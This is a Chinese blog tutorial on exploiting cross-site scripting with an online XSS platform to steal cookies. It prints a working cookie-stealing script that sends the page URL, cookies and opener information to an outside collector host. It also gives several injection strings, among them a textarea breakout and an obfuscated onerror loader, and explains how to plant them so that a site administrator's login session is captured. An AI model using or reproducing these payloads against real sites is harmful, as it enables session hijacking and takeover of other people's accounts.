热门标签
热门文章
- 1Unity Shader入门精要——第1章 欢迎来到Shader的世界_冯乐乐电子书
- 2Python键鼠控制·PyAutoGui库_pyautogui.dragrel
- 3AchartEngineActivity引擎绘制柱状图、曲线图_axchart
- 4纯css实现文本溢出省略号,兼容(火狐,IE9,chrome)_多文本实现两行后省略号兼容ie9
- 5python之词频统计_词频统计python代码
- 6vue element el-Cascader 级联选择器 收起二级菜单的问题解决办法详解_el-cascader-node
- 7全网Bento和3D?点评2024年UX/UI设计趋势
- 8Unity Shader入门精要——第3章 Unity Shader基础_unity material shader
- 9教程:AT32F435 QSPI 读写W25Q256
- 10Unity Image(RawImage) 实现按轴心放大缩小,序列化存储轴心信息,实现编译器窗口保存轴心_unity rawimage的大小
当前位置: article > 正文
XSS利用方式_xss弹cookie
作者:花生_TL007 | 2024-02-27 04:22:09
赞
踩
xss弹cookie
xss平台利用
xss平台地址
xss.fbisb.com 这个平台上有众多的xss代码
创建过程
点击的项目进行创建
![[Pasted image 20210109141006.png]]
进入项目创建的构造框,我们进行项目的描述
![[Pasted image 20210109141019.png]]
配置代码 勾选默认模块与keepsession
![[Pasted image 20210109141102.png]]
下面为代码,我们打cookie使用下面的这条代码就可以了
<sCRiPt sRC=http://xss.fbisb.com/EfXl></sCrIpT>
- 1
这个引用的代码就是下面的那一串大的代码
项目名称: 1
项目代码:
(function(){(new Image()).src='http://xss.fbisb.com/xss.php?do=api&id=EfXl&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})(); if('1'==1){keep=new Image();keep.src='http://xss.fbisb.com/xss.php?do=keepsession&id=EfXl&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
- 1
- 2
- 3
- 4
- 5
如何使用: 将如下代码植入怀疑出现xss的地方(注意'的转义),即可在 [项目内容](http://xss.fbisb.com/xss.php?do=project&act=view&id=1906) 观看XSS效果。 </tExtArEa>'"><sCRiPt sRC=http://xss.fbisb.com/EfXl></sCrIpT> 或者 </tEXtArEa>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.fbisb.com%2FEfXl%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//> 再或者以你任何想要的方式插入 http://xss.fbisb.com/EfXl 再或者以你任何想要的方式插入 <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';> ↓↓↓!~极限代码~!(可以不加最后的>回收符号,下面代码已测试成功)↓↓↓ <sCRiPt/SrC=//xss.fbisb.com/EfXl>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
页面操作
1.找到相关的页面,找到疑似xss的注入漏洞,然后把我们找到的代码放进去,进行提交
2.假设说我们已经提交上去了,只要管理员进行点击后,那么就会运行我们的代码,但是不管怎么样,都需要管理员登陆后台之后才能够生效
3.通过代码的运行会把cookie,以及一些相关的信息发送给网站
4. 然后我们打开刚刚的xss平台就可以看到刚刚网站的信息了
xss直接弹出cookie
<script>alert(document.cookie)</script>
- 1
中间的document.cookie是弹出cookie的语句,如果服务器没有进行过滤的话,那么我们可以直接通过这个操作拿到cookie
XSS总结
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/花生_TL007/article/detail/149999
推荐阅读
相关标签
